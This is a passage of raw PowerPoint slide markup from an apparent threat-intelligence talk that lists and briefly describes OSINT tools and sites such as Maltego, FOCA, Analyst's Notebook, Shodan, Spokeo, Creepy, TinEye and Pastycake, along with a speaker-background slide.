              <a:t>Duplicated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Lancope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> SMC as well as traditional Operations devices such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ciscoworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and HP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Openview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="jake_bandwidth"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648199" y="1524000"/>
            <a:ext cx="3984981" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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228801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971800"/>
            <a:ext cx="8229600" cy="944562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools and Resources for OSINT Analysis </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6CB578AE-4A26-CC4C-B2F8-EB2C2A85F4AA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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2576862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Open-Source Intelligence (OSINT) Tools and Sites </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tool – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- Flexible visualization tool that has several add-ons that make collection fast and easy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="349250" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tool – FOCA </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tool that is used in web audit work to fingerprint a target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tool – Analyst Notebook </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Premier Visualization and mapping tool</a:t>
            </a:r>
          </a:p>
          <a:p>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24</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0616817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OSINT Tool - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Maltego </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The name of a tool from Paterva Networks, designed to allow an analyst to take single or multiple pieces of information (an individual, asset, IP, DNS name, etc) and gather/collect that information in a format that allows them to visualize the rich information relationships. This tool also allows depth of information to be stored along with the visual data, including attachments and files related to the pieces of information in one location. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Site: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.paterva.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>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25</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87233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OSINT Tool – Maltego Example</a:t>
            </a:r>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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Maltego3-example.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="700314" y="1233310"/>
            <a:ext cx="7681686" cy="4753681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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482691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OSINT Tool - FOCA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A tool for performing fingerprinting processes and information gathering in web audit work. Free version performs search servers, domains, URLs and documents published, and the discovery of software versions on servers and clients. FOCA became famous for metadata extraction on public documents, but today is much more than that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.informatica64.com/foca.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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27</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0801972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OSINT Tool – FOCA Example</a:t>
            </a:r>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="foca_example"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="594461" y="1431439"/>
            <a:ext cx="7939939" cy="4588361"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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419471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OSINT Tool – Analyst Notebook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IBM® i2® Analyst's Notebook®</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> A visual intelligence analysis environment that enables government agencies and private sector businesses to maximize the value of the mass of information that they collect. It allows analysts to quickly collate, analyze and visualize data from disparate sources. It reduces the time required to discover key information in complex data and to deliver timely, actionable intelligence to help identify, predict, prevent, and disrupt criminal, terrorist, and fraudulent activities. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Site: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.ibm.com/software/products/us/en/analysts-notebook/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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29</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817975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Speaker Background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Currently Director of Cyber and Threat Intelligence Services at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Crypsis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prior </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Formerly Practice Director Incident Response and Forensics (AMER) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Foundstone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/McAfee  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Incident Response Auditor for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DoD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> CND-SP Audit team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lead Analyst White House (EOP) SOC, stood up and ran White House Cyber Threat Cell. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Over 15 year career spanning a variety of customers in Military, Federal and Law Enforcement </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Published Author and presenter at industry conferences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Holder of a National Security Trademark </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6CB578AE-4A26-CC4C-B2F8-EB2C2A85F4AA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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713768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OSINT Tool – Analyst Notebook Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 3" descr="AnalystNotebook_example"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="-10946" b="-10946"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1409708"/>
            <a:ext cx="8229600" cy="4525946"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</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998623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OSINT Site List </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Site list OSINT searching tools </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ShodanHQ  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SITE: http://www.shodanhq.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Spokeo </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SITE: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.spokeo.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Image Analysis 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Creepy image analysis </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>TinEye </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Social Media Tracking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tracking pastebin  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Hyperwired OSINT OPSEC Tool </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Check Usernames </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>http://checkusernames.com/</a:t>
            </a:r>
          </a:p>
          <a:p>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31</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6022913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OSINT Research - Shodan HQ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="3886200" cy="4906963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Search Engine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Created for security researchers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Collecting IP and service information for all IPv4 Internet connected hosts. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Program API’s available for multiple languages </a:t>
            </a:r>
          </a:p>
          <a:p>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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Shodan_example"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4600701" y="1222263"/>
            <a:ext cx="4262381" cy="4797537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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861104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OSINT Research - Spokeo.com </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="3810000" cy="4906963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Spokeo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a social network aggregator website that aggregates data from many online and offline sources. </a:t>
            </a:r>
          </a:p>
          <a:p>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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Spokeo-URL-example.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4091139" y="1184467"/>
            <a:ext cx="4604472" cy="4911533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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793561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Image Analysis – Creepy Tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="4038600" cy="4906963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An application that allows you to gather geo-location related information about users from social networking platforms and image hosting services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It’s even been featured on CNN!</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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="creepy_mapview.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4726182" y="1184467"/>
            <a:ext cx="4062604" cy="4759133"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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244799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Image Analysis - TinEye.com </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="3962400" cy="4906963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site allows you to upload or link to an image and determine where else it appears online</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Useful for tracking publicly posted images such as on Twitter</a:t>
            </a:r>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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="tineye.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="3881"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4506358" y="1180564"/>
            <a:ext cx="4637641" cy="4886407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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221784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OSINT Tool(s) – Pastebin Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="4114800" cy="4906963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Pastycake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Tracks keyword searches in real-time against pastebin.com, pastie.com and several others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Command line output </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Useful for integration into other tool outputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4391282" y="1233870"/>
            <a:ext cx="3934082" cy="2993191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="0" lvl="0" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzTx/>
